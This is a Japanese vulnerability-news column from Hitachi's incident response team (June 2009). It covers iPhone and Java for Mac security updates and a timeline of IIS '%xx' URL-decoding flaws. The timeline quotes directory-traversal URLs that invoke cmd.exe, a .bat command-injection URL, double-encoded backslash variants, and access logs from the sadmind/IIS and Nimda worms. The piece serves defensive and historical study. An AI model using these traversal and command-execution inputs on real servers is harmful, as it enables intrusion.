Hitach Incident Response Team

 6月21日までに明らかになったぜい弱性情報のうち,気になるものを紹介します。それぞれ,ベンダーなどの情報を参考に対処してください。

アップルiPhoneのセキュリティ・アップデート(2009/06/19)

 iPhone OS 3.0ソフトウエア・アップデートがリリースされました。影響を受けるパーツは,CoreGraphics,Exchange,ImageIO,International Components for Unicode (ICU),IPsec,libxml,Mail,MPEG-4 ビデオ・コーデック,プロファイル,Safari,電話,WebKitです。Mailのぜい弱性(CVE-2009-0961)については,その詳細がBugtraqでも報告されています。

 この報告によれば,HTMLのiframeタグとURIスキーマである“sms:(short message service)”,“tel:(telephone,RFC3966に規定)”を組み合わせることで,ユーザーが何も操作していないのに電話の発信動作が起こるとしています。URIスキーマはIANA(Internet Assigned Number Authority)によって管理されています。ただ実際には,IANAに登録されていないURIスキーマで普及しているものが多数あります。また,様々なサービスが普及することにより,当初は想定していなかった組み合わせが発生すること,その組み合わせにより意図しない動作が起こる可能性について忘れないようにしたいものです。

[参考情報]

アップルJava for Macのセキュリティ・アップデート(2009/06/10)

 Java for Macのセキュリティ・アップデートがリリースされました。このアップデートでは,Java 1.6をバージョン1.6.0_13に,Java 1.5をバージョン1.5.0_19に,Java 1.4をバージョン1.4.2_21に更新します。報告されているぜい弱性の中で,ぜい弱性そのものの特性を評価するCVSS(common vulnerability scoring system)の基本評価値が高く(7~10),さらに,ぜい弱性の種別を示すCWE(common weakness enumeration)がバッファ・エラー(CWE-119)である問題として,次のような問題が存在します。なお,これらのぜい弱性を悪用された場合,任意のコードを実行される可能性があります。

  • JVNDB-2008-002153:Java Runtime Environment(JRE)におけるJARファイルの処理に関するバッファ・オーバーフローのぜい弱性(CVE-2008-5354)
  • JVNDB-2008-002155:Java Runtime Environment(JRE)におけるTrueTypeフォントファイルの処理に関するバッファ・オーバーフローのぜい弱性(CVE-2008-5356)
  • JVNDB-2009-001165:JDKおよびJREのunpack200におけるバッファ・オーバフローのぜい弱性(CVE-2009-1096)
  • JVNDB-2009-001158:JDKおよびJREにおけるPNGイメージおよびGIFイメージの処理に関するバッファ・オーバーフローのぜい弱性(CVE-2009-1097)
  • JVNDB-2009-001159:JDKおよびJREにおけるGIFイメージの処理に関するバッファ・オーバーフローのぜい弱性(CVE-2009-1098)

[参考情報]

Cyber Security Bulletin SB09-166(2009/06/09)

 6月8日の週に報告されたぜい弱性の中から,マイクロソフトInternet Information Server/Serviceの WebDAV機能にあるぜい弱性に関連したトピックスとして,「%xx」記述のURL処理のぜい弱性を時系列で少し振り返ってみたいと思います(Vulnerability Summary for the Week of June 8, 2009)。

 「%xx」記述のURL処理に関するぜい弱性のはじまりは,2000年8月に報告された「MS00-057:正規化エラーによる,ファイルへの誤ったアクセス権の適用」,10月に報告された「MS00-078:Webサーバーフォルダへの侵入」にさかのぼります。

日付イベント
2000年8月10日『正規化エラーによる,ファイルへの誤ったアクセス権の適用(MS00-057,CVE-2000-0770)』の問題を解決する修正プログラムがリリースされました。
2000年10月10日PacketStormのWindowsメーリングリストに,Windows 2000上のIIS 5において,次のURLを実行することにより,任意のコマンドが実行できるという匿名報告が掲載されました。URL中の"%c1%1c"は,中国語環境で"%c1%1c"⇒"0x40+0x1c"⇒"0x5c"⇒「\(バックスラッシュ)」となります。
http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
2000年10月17日Rain Forest Puppy氏(ハンドル名)からマイクロソフトに報告された『Webサーバー フォルダへの侵入(MS00-078,CVE-2000-0884)』問題を解決する修正プログラムがリリースされました。
2000年10月17日Rain Forest Puppy氏(ハンドル名)が,Bugtraqメーリングリストに,"%c1%1c"記述によるコマンド実行がユニコードを用いたURL記述に起因するという報告(件名:IIS %c1%1c remote command execution)を投稿しました。この報告の中で,「/(スラッシュ)」はUTF-8という方法で2バイト表記した場合"%c0%af",「\(バックスラッシュ)」は"%c1%9c"に該当することが示されました。
2000年10月20日NSFOCUS社が,"%c1%1c"記述によるコマンド実行の問題に関する詳細情報を公開しました。
2000年11月6日NSFOCUS社からマイクロソフトに報告された『Webサーバーによるファイル要求の解析のぜい弱性(MS00-086,CVE-2000-0886)』問題を解決する修正プログラムがリリースされました。
2000年11月7日NSFOCUS社が,ファイル要求の解析のぜい弱性問題に関する詳細情報を公開しました。ぜい弱性は,次のURLに示すような".bat"ファイル直後にダブルクオーテーションを付加した場合に,引き続くコマンド(dirコマンド)を実行してしまうという問題でした。
http://site/scripts/test.bat"+&+dir+c:/+.exe
また,この詳細情報では,「%xx」記述を組み合わせたURLの問題についても言及しています。
http://site/scripts/test.bat"+"+&+dir+c:/+/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/route.exe
2001年5月7日sadmind/IISワームの発生
sadmind/IISワームは,Solarisシステムのsadmindのぜい弱性(CVE-1999-0977)を利用してシステムを侵害した後,他の脆弱なSolarisシステムに対して自身の伝搬活動を行ないました。さらに,マイクロソフトIISのぜい弱性(MS00-078,CAN-2000-0884)を利用してWebページを改ざんし,次のようなWebアクセスログを残しました。
GET /scripts/../../winnt/system32/cmd.exe /c+dir
GET /scripts/../../winnt/system32/cmd.exe /c+dir+..
GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe
GET /scripts/root.exe /c+echo+.././index.asp
2001年5月14日NSFOCUS社からマイクロソフトに報告された『不要なデコーディング操作によりIISでコマンドが実行される(MS01-026,CVE-2001-0333)』問題を解決する修正プログラムがリリースされました。
2001年5月15日NSFOCUS社が,不要なデコーディング操作のぜい弱性問題に関する詳細情報を公開しました。この問題は,「%xx」記述のURL復号を繰り返した場合に,意味のある文字列が出現してしまうことで,IIS上のコマンドを実行できてしまうという問題でした。例えば,"%255c","%%35c","%%35%63","%25%35%63"のいずれも復号を繰り返すことで「\(バックスラッシュ)」に変換されることになります。
%255c⇒%5c(%25を%に変換)
%%35c⇒%5c(%35を5に変換)
%%35%63⇒%5%63(%35を5に変換)⇒%5c(%63をcに変換)
%25%35%63⇒%%35%63(%25を%に変換)⇒%5c(同上)
2001年9月18日W32/Nimdaワームの発生
W32/Nimdaワームは,電子メールの添付ファイルとして自身の複製を他のコンピュータに送信する,マイクロソフトIISのぜい弱性MS00-078やW32/CodeRed IIが作成したバックドアを利用して感染する,ファイル共有を利用して感染する,マルウエアを埋め込まれたWebページの閲覧により感染するという多数の伝播経路を持ったマルウエアでした。W32/Nimdaワームは,次のようなWebアクセスログを残しました。
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
2009年6月9日『IISのぜい弱性により,特権が昇格される(MS09-020,CVE-2009-1535)』問題を解決する修正プログラムがリリースされました。

[参考情報]

  • Intrusion Detection FAQ:What are unicode vulnerabilities on Internet Information Server (IIS)?


    寺田 真敏
    Hitachi Incident Response Team
    チーフコーディネーションデザイナ

    『HIRT(Hitachi Incident Response Team)とは』

    HIRTは,日立グループのCSIRT連絡窓口であり,ぜい弱性対策,インシデント対応に関して,日立グループ内外との調整を行う専門チームです。ぜい弱性対策とはセキュリティに関するぜい弱性を除去するための活動,インシデント対応とは発生している侵害活動を回避するための活動です。HIRTでは,日立の製品やサービスのセキュリティ向上に関する活動に力を入れており,製品のぜい弱性対策情報の発信やCSIRT活動の成果を活かした技術者育成を行っています。